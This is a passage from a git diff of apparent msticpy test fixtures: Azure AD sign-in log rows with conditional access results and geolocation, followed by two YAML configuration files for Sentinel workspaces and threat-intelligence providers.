'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3a4d127f-5a89-4252-9f54-d79d86fe1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3a4d127f-5a89-4252-9f54-d79d86fe1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2132,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:26.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,178f26f6-aad0-4ac3-8245-5a715d378d5f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",669c457e-4441-4eab-88a8-07b71a3a1200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,669c457e-4441-4eab-88a8-07b71a3a1200,SigninLogs,Sucess,50.6406517,5.572050095
+2133,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,29:24.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,daed9055-fbab-46c2-a243-813fdcc6e8cc,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:29,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",246e5f30-378b-46e8-8b1d-2e86d9501100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,246e5f30-378b-46e8-8b1d-2e86d9501100,SigninLogs,Sucess,41.90428925,-85.99833679
+2134,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,35e24081-265c-48f8-a028-d8f6f08253dd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",88812ca6-4188-4e59-83ab-d71d00f81000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,88812ca6-4188-4e59-83ab-d71d00f81000,SigninLogs,Sucess,50.6406517,5.572050095
+2135,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5eddc168-2faf-4cdd-8616-aec3184c9839,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fbcf3a57-b92a-4bcf-a38d-09fbb6271200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,fbcf3a57-b92a-4bcf-a38d-09fbb6271200,SigninLogs,Sucess,33.7984581,-84.38828278
+2136,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:16.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b426ac10-9375-40d4-a2ee-070a9d7b9b4f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c8ea9bc1-b11e-4423-93a8-17c094231200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c8ea9bc1-b11e-4423-93a8-17c094231200,SigninLogs,Sucess,41.90428925,-85.99833679
+2137,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",6b822dcf-a353-4168-abd4-f166346d4900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6b822dcf-a353-4168-abd4-f166346d4900,SigninLogs,Sucess,35.01296997,-80.93171692
+2138,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:57.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0cfe4b5b-09c7-4394-bb27-21b9e9121200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0cfe4b5b-09c7-4394-bb27-21b9e9121200,SigninLogs,Sucess,33.0175209,35.44601059
diff --git a/tests/testdata/msticpyconfig-askql.yaml b/tests/testdata/msticpyconfig-askql.yaml
new file mode 100644
index 000000000..77f2d6cd4
--- /dev/null
+++ b/tests/testdata/msticpyconfig-askql.yaml
@@ -0,0 +1,17 @@
+AzureSentinel:
+  Workspaces:
+    Default:
+      WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf0"
+      TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db47"
+QueryDefinitions:
+  Default: 
+    - 'queries'
+  Custom:
+    - 'testdata'
+TIProviders:
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "AzSTI"
diff --git a/tests/testdata/msticpyconfig-kv.yaml b/tests/testdata/msticpyconfig-kv.yaml
new file mode 100644
index 000000000..4cab7cb6f
--- /dev/null
+++ b/tests/testdata/msticpyconfig-kv.yaml
@@ -0,0 +1,67 @@
+AzureSentinel:
+  Workspaces:
+    Default:
+      WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf3"
+      TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db49"
+    MyTestWS:
+      WorkspaceId: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantId: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+KeyVault:
+  TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db47"
+  SubscriptionId: 40dcc8bf-0478-4f3b-b275-ed0a94f2c013
+  ResourceGroup: ASIHuntOMSWorkspaceRG
+  AzureRegion: East US
+  VaultName: "mstic-ianhelle"
+  UseKeyring: True
+  Authority: global
+QueryDefinitions:
+  Default:
+    - 'queries'
+  Custom:
+    - 'testdata'
+TIProviders:
+  OTX:
+    Args:
+      AuthKey:
+        KeyVault: mstic-ianhelle/OTX_AuthKey
+    Primary: True
+    Provider: "OTX" # Explicitly name provider to override
+  VirusTotal:
+    Args:
+      AuthKey:
+        KeyVault:
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID:
+        KeyVault: XForce.ApiID
+      AuthKey:
+        KeyVault: XForce_AuthKey
+    Primary: False
+    Provider: "XForce"
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "NoLoad-AzSTI"
+  OpenPageRank:
+    Args:
+      AuthKey: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: True
+    Provider: Tor
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey:
